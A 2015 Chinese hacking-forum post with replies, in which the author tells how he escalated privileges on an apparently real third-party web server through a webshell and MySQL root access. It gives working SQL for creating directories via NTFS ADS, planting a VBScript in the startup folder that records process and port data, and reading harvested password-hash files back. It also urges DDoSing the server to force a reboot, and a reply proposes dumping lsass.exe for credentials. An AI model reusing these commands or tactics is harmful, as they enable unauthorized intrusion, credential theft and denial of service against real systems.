社区首页 › 技术文章 › [红盟杯]鸡肋提权之变态root利用

Binghe 发表于 2015-4-12 15:21:11

[红盟杯]鸡肋提权之变态root利用

##########################################
#Title    ：鸡肋提权之变态root利用
#Time   ：2015年4月12日
#Team：ihonker Team
#Author ： Binghe
#首发   ： 本人原创技术博客文章投稿至ihonker.org
#######################################

我来投稿，给红盟加加油

唉，这星期电脑被扣了，木法学习了，没法干活了。。。。特么刚到学校没几天，火龙童鞋就找我了，火急火燎。。。


http://www.binghesec.com/wp-content/uploads/2015/04/11111111111111111-1.png

你急有毛用，我电脑没带，怎么搞？ 联系了基友adminlm牛看看吧，他说有防护软件啥的，有root，无法UDF，于是我让他去Mof，经历一番周折，知道了，对mof目录也锁定了权限，无法用root导出mof文件到目录。。。卧槽，

http://www.binghesec.com/wp-content/uploads/2015/04/QQ%E5%9B%BE%E7%89%8720150409110821.png


由于我无法电脑操作，我又给他提供了一些思路，php无法调用ws组建，试试asp，后来听火龙瘠薄说整个服务器全都是phpweb的站点，。。提权陷入僵局。
后来喝了一杯82年的乐事冷静了一下，最后一招，写启动。。

于是让adminlm测试，他不知道再搞些什么东西，也听不懂我的思路，


http://www.binghesec.com/wp-content/uploads/2015/04/11111111111111111-5.png


http://www.binghesec.com/wp-content/uploads/2015/04/11111111111111111-8.png


。。。。我还是自己来吧。。。。

找个语文课的时间，啪。。，飞出来了。。。高二狗。。。



直接上传了一个udf.php,看了下情况
版本大于mysql5.0 dll要导出到mysql.exe目录\lib\plugin ,默认不存在\lib\plugin目录，需要用NTFS ads 引流来创建

select @@basedir;
//查找到mysql的目录 这里回显：D:\Huweishen.com\PHPWEB\MySQL Server 5.5
select 'It is dll' into dumpfile 'D:\\Huweishen.com\\PHPWEB\\MySQL Server 5.5\\lib::$INDEX_ALLOCATION';
//利用NTFS ADS创建lib目录 注意路径的替换。还有\换成\\
select 'It is dll' into dumpfile 'D:\\Huweishen.com\\PHPWEB\\MySQL Server 5.5\\lib\\plugin::$INDEX_ALLOCATION';
//利用NTFS ADS创建plugin目录


http://www.binghesec.com/wp-content/uploads/2015/04/11111111111111111-6.png



这样啊adminlm来的时候已经创建了已经存在目录



File 'D:\Huweishen.com\PHPWEB\MySQL Server 5.5\lib\plugin::$INDEX_ALLOCATION' already exists





导出试试看估计不行要不然adminlm、早拿下了


http://www.binghesec.com/wp-content/uploads/2015/04/11111111111111111-7.png


mof我也不测试哦了，估计也是不行因为这个鸟东西在，护卫神！！

http://www.binghesec.com/wp-content/uploads/2015/04/11111111111111111-3.png



写启动项添加用户我也不测试了万一上面有什么防护软件直接就阻止了

思路还有的，三行代码导hash，破解。ok
然后有人不服，你破解出来又如何，端口你知道？？？？
哦，我不知道，但是我还是可以查。。。看操作吧

建表：



create table binghe (cmd text);

好了，我们创建了一个新的表，表名为binghe，表中只存放一个字段，字段名为cmd，为text文本。
在表中插入内容

insert into binghe values ("set wshshell=createobject (""wscript.shell"" ) " );





插入三行代码导出hash，三行代码不予公布，免得众人装逼



insert into binghe values ("b=wshshell.run (""c0de1 & c0de2 & code3"",0) " );




三行代码运行之后会在启动目录生成三个文件，到时候loadfile读取，然后本地破解就可以获得管理密码
那么如何获得端口号？？
呵呵，这样来
先找到终端服务对应的pid 并将结果写入(>)shell目录的binghe.txt


    insert into binghe values ("b=wshshell.run (""tasklist /svc | find "termservice">D:/wwwroot/adpcd.com/include/binghe.txt"",0) " );
    注：这里的D:/wwwroot/adpcd.com/include/ 属于webshell目录


再来，查询端口服务，并将结果追加写入（>>）shell目录的binghe.txt


    insert into binghe values ("b=wshshell.run (""netstat -ano>>D:/wwwroot/adpcd.com/include/binghe.txt"",0) " );
    注：这里的D:/wwwroot/adpcd.com/include/ 属于webshell目录


看看我在shell上面的实际操作


http://www.binghesec.com/wp-content/uploads/2015/04/333-3.png

这里打了性感的马赛克


http://www.binghesec.com/wp-content/uploads/2015/04/333-1.png

http://www.binghesec.com/wp-content/uploads/2015/04/333-5.png

http://www.binghesec.com/wp-content/uploads/2015/04/333-2.png


来查一下是不是写进去了？？

select * from binghe;

http://www.binghesec.com/wp-content/uploads/2015/04/0.png

好了，一切完毕开始导出到启动项


    select * from binghe into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\binghe.vbs";

再来loadfile看看 应该写进去了

http://www.binghesec.com/wp-content/uploads/2015/04/000000000000000000000000000000000.png
接下来的事就不是我的事情了
@火龙，交给你，你不是说你的朋友有多少多少G纯流量吗，狠狠地ddos，打到管理员他喊叔叔也不停，然后他就去重启服务器了，然后。。你懂得！

还是说下吧，重启之后，按照我的预想，会在D:/wwwroot/adpcd.com/include/这个目录下生成一个Binghe.txt（内容包括termservice进程服务的pid和端口细节及对应pid，会提权的人都知道这两个pid对比就会获得终端端口号），另外在启动目录会生成三个hash的文件，到时候你来找我，我去loadfile他的hash，命令如下：

    select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file1') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe1.txt'
   
    select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file2') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe2.txt'
   
    select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file3') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe3.txt'
   
    注：file1\file2\file3 分别为三个hash文件

额，这是最后的思路了，比较鸡肋。。。没有办法的办法
静待重启吧，时间问题。

另外谢谢adminlm大牛帮我测试，好机油，下次去找你玩哈
另外说一句，谁对我好我对谁好，火龙大哥帮过我不少，人要有感激之心，他有问题我当倾力解决。。。不说了，我该回去了卧槽还要翻墙进去。。别举报我！

Lxck 发表于 2015-4-12 15:48:24

支持原创，思路不错。

chong 发表于 2015-4-12 18:52:07

竟然是护卫神的mysql 我有n多个这种webshell 提权不了 回复完看看先

ICBM 发表于 2015-4-12 20:21:54

这思路有点厉害哦，不知道最后成功没有，最重要的是楼主你才高二就那么牛逼真的好么

王珂 发表于 2015-4-12 21:04:02

为什么刚开始说导入启动项不行，后来还是导入到了启动项里面

a13775647904 发表于 2015-4-12 21:05:33

插入三行代码导出hash，三行代码不予公布，免得众人装逼醉了，几年前的东西

tintion 发表于 2015-4-12 21:44:39

能写文件到启动那里的话，直接用procdump把lsass.exe dump出来到网站某个目录，等管理员重启的时候不就可以下载下来看明文了吗？hash破解很费时额。（纯个人见解）

Binghe 发表于 2015-4-12 23:56:03

王珂 发表于 2015-4-12 21:04
为什么刚开始说导入启动项不行，后来还是导入到了启动项里面

开始想的写远控木马进去后来想想各种杀软还是放弃了那三行代码过任何杀软所以后来还是写进去

Binghe 发表于 2015-4-12 23:57:53

tintion 发表于 2015-4-12 21:44
能写文件到启动那里的话，直接用procdump把lsass.exe dump出来到网站某个目录，等管理员重启的时候不就可以 ...

这是不可以的，护卫神会拦截抓工具抓hash 或明文

Binghe 发表于 2015-4-12 23:59:37

a13775647904 发表于 2015-4-12 21:05
插入三行代码导出hash，三行代码不予公布，免得众人装逼醉了，几年前的东西 ...

大牛见笑了小弟是高中生还在学习中

查看完整版本: [红盟杯]鸡肋提权之变态root利用